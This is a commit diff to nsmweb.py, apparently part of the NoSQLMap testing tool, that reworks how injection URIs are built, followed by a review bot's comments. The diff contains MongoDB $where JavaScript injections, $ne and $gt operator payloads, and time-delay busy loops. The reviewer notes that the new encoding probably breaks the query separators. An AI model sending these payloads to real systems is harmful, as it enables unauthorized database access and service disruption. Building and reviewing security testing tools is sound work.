
Commit d06f69b

authored
Merge pull request #60 from SudhanshuC/master
Update nsmweb.py
2 parents 98021fc + 6c9fbe9 commit d06f69b


1 file changed

+19
-35
lines changed

1 file changed

+19
-35
lines changed

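--- a/nsmweb.py
+++ b/nsmweb.py
@@ -133,6 +133,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
 else:
 print "Test 2: $where injection (string escape)"
 
+print uriArray[2]
 req = urllib2.Request(uriArray[2], None, requestHeaders)
 errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
 
@@ -890,49 +891,31 @@ def buildUri(origUri, randValue):
 return
 
 x = 0
-uriArray[0] = split_uri[0] + "?"
-uriArray[1] = split_uri[0] + "?"
-uriArray[2] = split_uri[0] + "?"
-uriArray[3] = split_uri[0] + "?"
-uriArray[4] = split_uri[0] + "?"
-uriArray[5] = split_uri[0] + "?"
-uriArray[6] = split_uri[0] + "?"
-uriArray[7] = split_uri[0] + "?"
-uriArray[8] = split_uri[0] + "?"
-uriArray[9] = split_uri[0] + "?"
-uriArray[10] = split_uri[0] + "?"
-uriArray[11] = split_uri[0] + "?"
-uriArray[12] = split_uri[0] + "?"
-uriArray[13] = split_uri[0] + "?"
-uriArray[14] = split_uri[0] + "?"
-uriArray[15] = split_uri[0] + "?"
-uriArray[16] = split_uri[0] + "?"
-uriArray[17] = split_uri[0] + "?"
-uriArray[18] = split_uri[0] + "?"
+
 
 for item in paramName:
 
 if paramName[x] in injOpt:
 uriArray[0] += paramName[x] + "=" + randValue + "&"
 uriArray[1] += paramName[x] + "[$ne]=" + randValue + "&"
-uriArray[2] += paramName[x] + "=" + urllib.quote("a'; return db.a.find(); var dummy='!") + "&"
-uriArray[3] += paramName[x] + "=" + urllib.quote("1; return db.a.find(); var dummy=1") + "&"
-uriArray[4] += paramName[x] + "=" + urllib.quote("a'; return db.a.findOne(); var dummy='!") + "&"
-uriArray[5] += paramName[x] + "=" + urllib.quote("1; return db.a.findOne(); var dummy=1") + "&"
-uriArray[6] += paramName[x] + "=" + urllib.quote("a'; return this.a != '" + randValue + "'; var dummy='!") + "&"
-uriArray[7] += paramName[x] + "=" + urllib.quote("1; return this.a !=" + randValue + "; var dummy=1") + "&"
+uriArray[2] += paramName[x] + "=a'; return db.a.find(); var dummy='!" + "&"
+uriArray[3] += paramName[x] + "=1; return db.a.find(); var dummy=1" + "&"
+uriArray[4] += paramName[x] + "=a'; return db.a.findOne(); var dummy='!" + "&"
+uriArray[5] += paramName[x] + "=1; return db.a.findOne(); var dummy=1" + "&"
+uriArray[6] += paramName[x] + "=a'; return this.a != '" + randValue + "'; var dummy='!" + "&"
+uriArray[7] += paramName[x] + "=1; return this.a !=" + randValue + "; var dummy=1" + "&"
 uriArray[8] += paramName[x] + "[$gt]=&"
-uriArray[9] += paramName[x] + "=" + urllib.quote("1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1") + "&"
-uriArray[10] += paramName[x] + "=" + urllib.quote("a\"; return db.a.find(); var dummy='!") + "&"
-uriArray[11] += paramName[x] + "=" + urllib.quote("a\"; return this.a != '" + randValue + "'; var dummy='!") + "&"
-uriArray[12] += paramName[x] + "=" + urllib.quote("a\"; return db.a.findOne(); var dummy=\"!") + "&"
-uriArray[13] += paramName[x] + "=" + urllib.quote("a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!") + "&"
-uriArray[14] += paramName[x] + urllib.quote("a'; return true; var dum='a")
+uriArray[9] += paramName[x] + "=1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1" + "&"
+uriArray[10] += paramName[x] + "=a\"; return db.a.find(); var dummy='!" + "&"
+uriArray[11] += paramName[x] + "=a\"; return this.a != '" + randValue + "'; var dummy='!" + "&"
+uriArray[12] += paramName[x] + "=a\"; return db.a.findOne(); var dummy=\"!" + "&"
+uriArray[13] += paramName[x] + "=a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!" + "&"
+uriArray[14] += paramName[x] + "a'; return true; var dum='a"
 uriArray[15] += paramName[x] + "1; return true; var dum=2"
 #Add values that can be manipulated for database attacks
-uriArray[16] += paramName[x] + "=" + urllib.quote("a\'; ---")
+uriArray[16] += paramName[x] + "=a\'; ---"
 uriArray[17] += paramName[x] + "=1; if ---"
-uriArray[18] += paramName[x] + "=" + urllib.quote("a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!") + "&"
+uriArray[18] += paramName[x] + "=a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!" + "&"
 
 else:
 uriArray[0] += paramName[x] + "=" + paramValue[x] + "&"
@@ -959,7 +942,9 @@ def buildUri(origUri, randValue):
 #Clip the extra & off the end of the URL
 x = 0
 while x <= 18:
-uriArray[x]= uriArray[x][:-1]
+# uriArray[x]= uriArray[x][:-1]
+uriArray[x]=split_uri[0]+"?"+urllib.quote_plus(uriArray[x][:-1])
+
 x += 1
 
 return uriArray[0]
@@ -1193,4 +1178,3 @@ def getDBInfo():
 crackHash = raw_input("Crack another hash (y/n)?")
 raw_input("Press enter to continue...")
 return
-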
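Review bot: The rebuilt-URI line in the clip loop, `uriArray[x]=split_uri[0]+"?"+urllib.quote_plus(uriArray[x][:-1])`, percent-encodes the whole accumulated query string, so the `=` and `&` separators the loop above builds in are encoded too and the server no longer receives them as parameter delimiters; that differs from the per-value `urllib.quote` calls this commit removes, and it is worth confirming it is intended. The commented-out `# uriArray[x]= uriArray[x][:-1]` directly above it should be deleted rather than kept, and the `print uriArray[2]` added in getApps in the first hunk reads as a leftover debug statement that writes the built URI to stdout on every run. With the nineteen `uriArray[n] = split_uri[0] + "?"` initialisations removed, the `+=` statements in the loop now depend on uriArray entries being initialised somewhere outside the hunk; buildUri starts before this hunk, so that cannot be checked here.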
